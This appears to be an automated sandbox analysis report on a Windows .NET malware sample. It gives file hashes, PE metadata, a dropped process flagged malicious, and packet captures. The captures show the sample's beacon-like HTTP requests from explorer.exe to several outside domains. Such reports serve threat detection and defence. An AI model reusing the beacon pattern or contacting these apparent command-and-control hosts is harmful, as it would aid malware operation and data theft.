C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Download File
Process:	C:\Users\user\Desktop\4NoiNHCNoU.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	42080
Entropy (8bit):	6.2125074198825105
Encrypted:	false
SSDEEP:	384:gc3JOvwWj8Gpw0A67dOpRIMKJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+QsPZw:g4JU8g17dl6Iq88MoBd7mFViqM5sL2
MD5:	F2A47587431C466535F3C3D3427724BE
SHA1:	90DF719241CE04828F0DD4D31D683F84790515FF
SHA-256:	23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
SHA-512:	E9D0819478DDDA47763C7F5F617CD258D0FACBBBFFE0C7A965EDE9D0D884A6D7BB445820A3FD498B243BBD8BECBA146687B61421745E32B86272232C6F9E90D8
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: SoPwZKv1Mf.exe, Detection: malicious, Browse Filename: bXFjrxjRlb.exe, Detection: malicious, Browse Filename: Generator.cont.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 560911_P.EXE, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: IMG_61779.pdf.exe, Detection: malicious, Browse Filename: IMG_5391.EXE, Detection: malicious, Browse Filename: czZ769nM6r.exe, Detection: malicious, Browse Filename: IMG_1107.EXE, Detection: malicious, Browse Filename: r3q6Bv8naR.exe, Detection: malicious, Browse Filename: sy1RnlHl8Y.exe, Detection: malicious, Browse Filename: qyMlTIBawC.exe, Detection: malicious, Browse Filename: Qn2AQrgfqJ.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.PackedNET.509.28611.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.PackedNET.509.17348.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.PackedNET.509.7497.exe, Detection: malicious, Browse Filename: IMG_12283.exe, Detection: malicious, Browse Filename: IMG_06176.pdf.exe, Detection: malicious, Browse Filename: IMG_50617.pdf.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z.Z..............0..X...........w... ........@.. ...................................`.................................Hw..O....... ............f..`>...........v............................................... ............... ..H............text....W... ...X.................. ..`.rsrc... ............Z..............@..@.reloc...............d..............@..B................\|w......H........#...Q...................u.......................................0..K........-....i.......r...p.o....,....r...p.o....-.......o......o.....$........o....(....(......:...(....o......r...p.o.......4........o......... ........o......s ........o!...s".....s#.......r]..prg..po$.....r...p.o$.....r...pr...po$.........s.........(%.....tB...r...p(&...&..r...p.('...s(.......o)...&..o....(+...o,.....&...(-...........3..@......R...s.....s....(....:.(/.....}P...J.{P....o0..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.619586569577208
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	4NoiNHCNoU.exe
File size:	770560
MD5:	204e0bf841b9900fa03d6dff302857f3
SHA1:	a3b3152dbea14ed71a5e226a123433dfc3ecb60a
SHA256:	2ba9185ecb7b43e54242e560724993fbf5e24c3e1acd57889ac9dc305e934045
SHA512:	edaae04e2cb167fdb6a07c83994b48cbcd9b084ceecc5f2558b5f1ce499272364ffc4ed572b171e21b204c5c05846e42e983297c24943b669c9f7705deb80de3
SSDEEP:	12288:LyooVOHfNbxp8pay/ORjp1C0kCeVxxQqR:LyooV2/8SR1Y/h
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Y....................v...J........... ........@.. ....................... ............`................................

File Icon


Icon Hash:	aaacae8e96a2c0e6

Static PE Info

General
Entrypoint:	0x4b942e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Time Stamp:	0x7F00759 [Fri Mar 22 07:57:13 1974 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb93e0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xba000	0x46f2	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb7434	0xb7600	False	0.557991969155	data	5.60539545404	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xba000	0x46f2	0x4800	False	0.154242621528	data	2.48702752708	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc0000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0xba130	0x4028	data
RT_GROUP_ICON	0xbe158	0x14	data
RT_VERSION	0xbe16c	0x39c	data
RT_MANIFEST	0xbe508	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2005 4;@:9>CF>>5?A@<AE4D4
Assembly Version	1.0.0.0
InternalName	IMG_43016.exe
FileVersion	5.8.10.13
CompanyName	4;@:9>CF>>5?A@<AE4D4
Comments	A7E@4HA4?@7HB;B98GH
ProductName	56:53B29963AH9:F76>A
ProductVersion	5.8.10.13
FileDescription	56:53B29963AH9:F76>A
OriginalFilename	IMG_43016.exe

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 26, 2021 17:08:48.645308018 CET	49761	80	192.168.2.4	216.58.207.179
Jan 26, 2021 17:08:48.687963963 CET	80	49761	216.58.207.179	192.168.2.4
Jan 26, 2021 17:08:48.688122034 CET	49761	80	192.168.2.4	216.58.207.179
Jan 26, 2021 17:08:48.688277960 CET	49761	80	192.168.2.4	216.58.207.179
Jan 26, 2021 17:08:48.730931044 CET	80	49761	216.58.207.179	192.168.2.4
Jan 26, 2021 17:08:48.747661114 CET	80	49761	216.58.207.179	192.168.2.4
Jan 26, 2021 17:08:48.747905016 CET	49761	80	192.168.2.4	216.58.207.179
Jan 26, 2021 17:08:48.748102903 CET	80	49761	216.58.207.179	192.168.2.4
Jan 26, 2021 17:08:48.750555992 CET	49761	80	192.168.2.4	216.58.207.179
Jan 26, 2021 17:08:48.790555954 CET	80	49761	216.58.207.179	192.168.2.4
Jan 26, 2021 17:09:29.897218943 CET	49764	80	192.168.2.4	199.59.242.153
Jan 26, 2021 17:09:30.020919085 CET	80	49764	199.59.242.153	192.168.2.4
Jan 26, 2021 17:09:30.021130085 CET	49764	80	192.168.2.4	199.59.242.153
Jan 26, 2021 17:09:30.021341085 CET	49764	80	192.168.2.4	199.59.242.153
Jan 26, 2021 17:09:30.144951105 CET	80	49764	199.59.242.153	192.168.2.4
Jan 26, 2021 17:09:30.147169113 CET	80	49764	199.59.242.153	192.168.2.4
Jan 26, 2021 17:09:30.147202969 CET	80	49764	199.59.242.153	192.168.2.4
Jan 26, 2021 17:09:30.147219896 CET	80	49764	199.59.242.153	192.168.2.4
Jan 26, 2021 17:09:30.147231102 CET	80	49764	199.59.242.153	192.168.2.4
Jan 26, 2021 17:09:30.147243023 CET	80	49764	199.59.242.153	192.168.2.4
Jan 26, 2021 17:09:30.147464037 CET	49764	80	192.168.2.4	199.59.242.153
Jan 26, 2021 17:09:30.147546053 CET	49764	80	192.168.2.4	199.59.242.153
Jan 26, 2021 17:09:53.305131912 CET	49765	80	192.168.2.4	3.234.181.234
Jan 26, 2021 17:09:53.431636095 CET	80	49765	3.234.181.234	192.168.2.4
Jan 26, 2021 17:09:53.431780100 CET	49765	80	192.168.2.4	3.234.181.234
Jan 26, 2021 17:09:53.431937933 CET	49765	80	192.168.2.4	3.234.181.234
Jan 26, 2021 17:09:53.559004068 CET	80	49765	3.234.181.234	192.168.2.4
Jan 26, 2021 17:09:53.559031963 CET	80	49765	3.234.181.234	192.168.2.4
Jan 26, 2021 17:09:53.559053898 CET	80	49765	3.234.181.234	192.168.2.4
Jan 26, 2021 17:09:53.559077024 CET	80	49765	3.234.181.234	192.168.2.4
Jan 26, 2021 17:09:53.559540033 CET	49765	80	192.168.2.4	3.234.181.234
Jan 26, 2021 17:09:53.559623003 CET	49765	80	192.168.2.4	3.234.181.234
Jan 26, 2021 17:09:53.685353994 CET	80	49765	3.234.181.234	192.168.2.4
Jan 26, 2021 17:10:13.988073111 CET	49766	80	192.168.2.4	216.24.179.55
Jan 26, 2021 17:10:14.173216105 CET	80	49766	216.24.179.55	192.168.2.4
Jan 26, 2021 17:10:14.173377037 CET	49766	80	192.168.2.4	216.24.179.55
Jan 26, 2021 17:10:14.173506021 CET	49766	80	192.168.2.4	216.24.179.55
Jan 26, 2021 17:10:14.359297991 CET	80	49766	216.24.179.55	192.168.2.4
Jan 26, 2021 17:10:14.359316111 CET	80	49766	216.24.179.55	192.168.2.4
Jan 26, 2021 17:10:14.359328985 CET	80	49766	216.24.179.55	192.168.2.4
Jan 26, 2021 17:10:14.359504938 CET	49766	80	192.168.2.4	216.24.179.55
Jan 26, 2021 17:10:14.359603882 CET	49766	80	192.168.2.4	216.24.179.55
Jan 26, 2021 17:10:14.547630072 CET	80	49766	216.24.179.55	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 26, 2021 17:07:31.394352913 CET	55854	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:07:31.442203045 CET	53	55854	8.8.8.8	192.168.2.4
Jan 26, 2021 17:07:32.286022902 CET	64549	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:07:32.342454910 CET	53	64549	8.8.8.8	192.168.2.4
Jan 26, 2021 17:07:33.203152895 CET	63153	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:07:33.251071930 CET	53	63153	8.8.8.8	192.168.2.4
Jan 26, 2021 17:07:34.250425100 CET	52991	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:07:34.306971073 CET	53	52991	8.8.8.8	192.168.2.4
Jan 26, 2021 17:07:37.835402012 CET	53700	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:07:37.892190933 CET	53	53700	8.8.8.8	192.168.2.4
Jan 26, 2021 17:07:39.025571108 CET	51726	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:07:39.073363066 CET	53	51726	8.8.8.8	192.168.2.4
Jan 26, 2021 17:07:40.548142910 CET	56794	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:07:40.606688023 CET	53	56794	8.8.8.8	192.168.2.4
Jan 26, 2021 17:07:41.933109999 CET	56534	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:07:41.989626884 CET	53	56534	8.8.8.8	192.168.2.4
Jan 26, 2021 17:07:43.245419025 CET	56627	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:07:43.296118975 CET	53	56627	8.8.8.8	192.168.2.4
Jan 26, 2021 17:07:44.217037916 CET	56621	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:07:44.267735004 CET	53	56621	8.8.8.8	192.168.2.4
Jan 26, 2021 17:07:45.158593893 CET	63116	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:07:45.208209038 CET	53	63116	8.8.8.8	192.168.2.4
Jan 26, 2021 17:07:46.156187057 CET	64078	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:07:46.209414005 CET	53	64078	8.8.8.8	192.168.2.4
Jan 26, 2021 17:07:48.044967890 CET	64801	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:07:48.101473093 CET	53	64801	8.8.8.8	192.168.2.4
Jan 26, 2021 17:07:59.689146042 CET	61721	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:07:59.737143040 CET	53	61721	8.8.8.8	192.168.2.4
Jan 26, 2021 17:08:12.337807894 CET	51255	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:08:12.398538113 CET	53	51255	8.8.8.8	192.168.2.4
Jan 26, 2021 17:08:20.700083017 CET	61522	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:08:20.760898113 CET	53	61522	8.8.8.8	192.168.2.4
Jan 26, 2021 17:08:28.058864117 CET	52337	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:08:28.115331888 CET	53	52337	8.8.8.8	192.168.2.4
Jan 26, 2021 17:08:28.916161060 CET	55046	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:08:28.972858906 CET	53	55046	8.8.8.8	192.168.2.4
Jan 26, 2021 17:08:29.858624935 CET	49612	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:08:29.914983034 CET	53	49612	8.8.8.8	192.168.2.4
Jan 26, 2021 17:08:30.348535061 CET	49285	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:08:30.404861927 CET	53	49285	8.8.8.8	192.168.2.4
Jan 26, 2021 17:08:30.866511106 CET	50601	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:08:30.925765038 CET	53	50601	8.8.8.8	192.168.2.4
Jan 26, 2021 17:08:31.452265024 CET	60875	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:08:31.511481047 CET	53	60875	8.8.8.8	192.168.2.4
Jan 26, 2021 17:08:31.663589954 CET	56448	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:08:31.737837076 CET	53	56448	8.8.8.8	192.168.2.4
Jan 26, 2021 17:08:32.115817070 CET	59172	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:08:32.177277088 CET	53	59172	8.8.8.8	192.168.2.4
Jan 26, 2021 17:08:33.000488043 CET	62420	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:08:33.061288118 CET	53	62420	8.8.8.8	192.168.2.4
Jan 26, 2021 17:08:34.165752888 CET	60579	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:08:34.222181082 CET	53	60579	8.8.8.8	192.168.2.4
Jan 26, 2021 17:08:34.715773106 CET	50183	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:08:34.772411108 CET	53	50183	8.8.8.8	192.168.2.4
Jan 26, 2021 17:08:37.264513016 CET	61531	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:08:37.325027943 CET	53	61531	8.8.8.8	192.168.2.4
Jan 26, 2021 17:08:48.502526045 CET	49228	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:08:48.636364937 CET	53	49228	8.8.8.8	192.168.2.4
Jan 26, 2021 17:09:09.497134924 CET	59794	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:09:09.572475910 CET	53	59794	8.8.8.8	192.168.2.4
Jan 26, 2021 17:09:16.022726059 CET	55916	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:09:16.070733070 CET	53	55916	8.8.8.8	192.168.2.4
Jan 26, 2021 17:09:18.174031973 CET	52752	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:09:18.241321087 CET	53	52752	8.8.8.8	192.168.2.4
Jan 26, 2021 17:09:29.752019882 CET	60542	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:09:29.895988941 CET	53	60542	8.8.8.8	192.168.2.4
Jan 26, 2021 17:09:53.156522989 CET	60689	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:09:53.303366899 CET	53	60689	8.8.8.8	192.168.2.4
Jan 26, 2021 17:10:13.778407097 CET	64206	53	192.168.2.4	8.8.8.8
Jan 26, 2021 17:10:13.987082958 CET	53	64206	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 26, 2021 17:08:48.502526045 CET	192.168.2.4	8.8.8.8	0x3c82	Standard query (0)	www.hull3dprints.com	A (IP address)	IN (0x0001)
Jan 26, 2021 17:09:09.497134924 CET	192.168.2.4	8.8.8.8	0x737e	Standard query (0)	www.cookiefoo.com	A (IP address)	IN (0x0001)
Jan 26, 2021 17:09:29.752019882 CET	192.168.2.4	8.8.8.8	0xa910	Standard query (0)	www.artdonline.com	A (IP address)	IN (0x0001)
Jan 26, 2021 17:09:53.156522989 CET	192.168.2.4	8.8.8.8	0xe9fc	Standard query (0)	www.milkandmemories.com	A (IP address)	IN (0x0001)
Jan 26, 2021 17:10:13.778407097 CET	192.168.2.4	8.8.8.8	0xd548	Standard query (0)	www.monalizacos.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 26, 2021 17:08:48.636364937 CET	8.8.8.8	192.168.2.4	0x3c82	No error (0)	www.hull3dprints.com	ghs.googlehosted.com		CNAME (Canonical name)	IN (0x0001)
Jan 26, 2021 17:08:48.636364937 CET	8.8.8.8	192.168.2.4	0x3c82	No error (0)	ghs.googlehosted.com		216.58.207.179	A (IP address)	IN (0x0001)
Jan 26, 2021 17:09:09.572475910 CET	8.8.8.8	192.168.2.4	0x737e	Name error (3)	www.cookiefoo.com	none	none	A (IP address)	IN (0x0001)
Jan 26, 2021 17:09:29.895988941 CET	8.8.8.8	192.168.2.4	0xa910	No error (0)	www.artdonline.com		199.59.242.153	A (IP address)	IN (0x0001)
Jan 26, 2021 17:09:53.303366899 CET	8.8.8.8	192.168.2.4	0xe9fc	No error (0)	www.milkandmemories.com	comingsoon.namebright.com		CNAME (Canonical name)	IN (0x0001)
Jan 26, 2021 17:09:53.303366899 CET	8.8.8.8	192.168.2.4	0xe9fc	No error (0)	comingsoon.namebright.com	nbparking-lb1-e8979d80a94bc16b.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Jan 26, 2021 17:09:53.303366899 CET	8.8.8.8	192.168.2.4	0xe9fc	No error (0)	nbparking-lb1-e8979d80a94bc16b.elb.us-east-1.amazonaws.com		3.234.181.234	A (IP address)	IN (0x0001)
Jan 26, 2021 17:10:13.987082958 CET	8.8.8.8	192.168.2.4	0xd548	No error (0)	www.monalizacos.com		216.24.179.55	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.hull3dprints.com

www.artdonline.com

www.milkandmemories.com

www.monalizacos.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49761	216.58.207.179	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2021 17:08:48.688277960 CET	4798	OUT	GET /wdva/?CTvp=fvUh_lYhi2Qtqn&YP7HsZXp=dtwHAOGjt/+zpbp36VfwrlpLqx9PqTyEssCs5akk3XqA2N3Rg4iBrIryvB1IVPRuISQ2 HTTP/1.1 Host: www.hull3dprints.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 26, 2021 17:08:48.747661114 CET	4799	IN	HTTP/1.1 301 Moved Permanently Location: https://www.etsy.com/shop/Hull3DPrints Date: Tue, 26 Jan 2021 16:08:48 GMT Content-Type: text/html; charset=UTF-8 Server: ghs Content-Length: 235 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 65 74 73 79 2e 63 6f 6d 2f 73 68 6f 70 2f 48 75 6c 6c 33 44 50 72 69 6e 74 73 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.etsy.com/shop/Hull3DPrints">here</A>.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49764	199.59.242.153	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2021 17:09:30.021341085 CET	4837	OUT	GET /wdva/?CTvp=fvUh_lYhi2Qtqn&YP7HsZXp=xHc9ODtVxj0eUWmi3yu1PHJO+9FS2s4H+8Xc5Nf8URN5DAD0y+vEo6QceVJID6bTGhq7 HTTP/1.1 Host: www.artdonline.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 26, 2021 17:09:30.147169113 CET	4838	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 26 Jan 2021 16:09:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rOHYb9Z6Wy9T1+v+/2OiI1DBd5wjCInqR5Zn6XhVNf2Hb9ATyIElVxP9iU+iEhAeHIpde7JKlMccR/geMyf+aw== Data Raw: 65 65 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 72 4f 48 59 62 39 5a 36 57 79 39 54 31 2b 76 2b 2f 32 4f 69 49 31 44 42 64 35 77 6a 43 49 6e 71 52 35 5a 6e 36 58 68 56 4e 66 32 48 62 39 41 54 79 49 45 6c 56 78 50 39 69 55 2b 69 45 68 41 65 48 49 70 64 65 37 4a 4b 6c 4d 63 63 52 2f 67 65 4d 79 66 2b 61 77 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 72 65 6c 61 74 65 64 20 6c 69 6e 6b 73 20 74 6f 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 36 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 36 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 37 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 20 2d 2d 3e 3c 62 6f 64 79 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 67 5f 70 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 0a 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 61 7a 78 3d 6c 6f 63 61 74 69 6f 6e 2c 44 44 3d 44 54 2e 63 72 65 